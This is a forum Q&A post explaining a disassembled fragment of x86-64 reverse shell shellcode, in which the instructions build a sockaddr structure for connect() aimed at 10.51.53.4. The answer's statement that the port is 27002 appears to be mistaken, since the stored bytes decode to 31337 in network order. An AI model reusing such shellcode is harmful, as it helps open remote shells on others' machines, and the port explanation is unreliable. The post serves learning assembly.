x86 64 Reverse shell shellcode

Question

I am looking a reverse shell shellcode from this link. I am not able to follow the reason for the following instructions in the shellcode:

4000a3:   4d 31 d2                xor    r10,r10
4000a6:   41 52                   push   r10
4000a8:   c6 04 24 02             mov    BYTE PTR [rsp],0x2
4000ac:   66 c7 44 24 02 7a 69    mov    WORD PTR [rsp+0x2],0x697a
4000b3:   c7 44 24 04 0a 33 35    mov    DWORD PTR [rsp+0x4],0x435330a
4000ba:   04 
4000bb:   48 89 e6                mov    rsi,rsp

I searched other SO questions, and I find that BYTE/WORD/DWORD PTR would be used to assign a byte/word/dword. Since this x86 64, I'm assuming WORD here means 2 bytes and DWORD means 4 bytes (please correct me if I'm wrong). The author is pushing zero on the stack. Then he has 3 mov instructions. Assume RSP initially points to:

x00 x00 x00 x00 x00 x00 x00 x00

1) Is the following the effect of the three mov instructions (assuming little endian) ?

x04 x35 x33 x0a x7a x69 x00 x02

2) If yes, then what is the author achieving by it because isn't the next mov instructions overwriting what's pointed by rsp ?

Thanks

Answer 1

1) Yes

2) Author is saving the sockaddr for the socket connect syscall

       int connect(int sockfd, const struct sockaddr *addr,
               socklen_t addrlen);

In x86-64, the arguments are the registers rdi, rsi and rdx. So, He is moving the pointer addr pointer to rsi register.

 mov    BYTE PTR [rsp],0x2              ; Family Address (PF_INET)
 mov    WORD PTR [rsp+0x2],0x697a       ; port = 27002
 mov    DWORD PTR [rsp+0x4],0x435330a   ; addr = 10.51.53.4 (0a333504)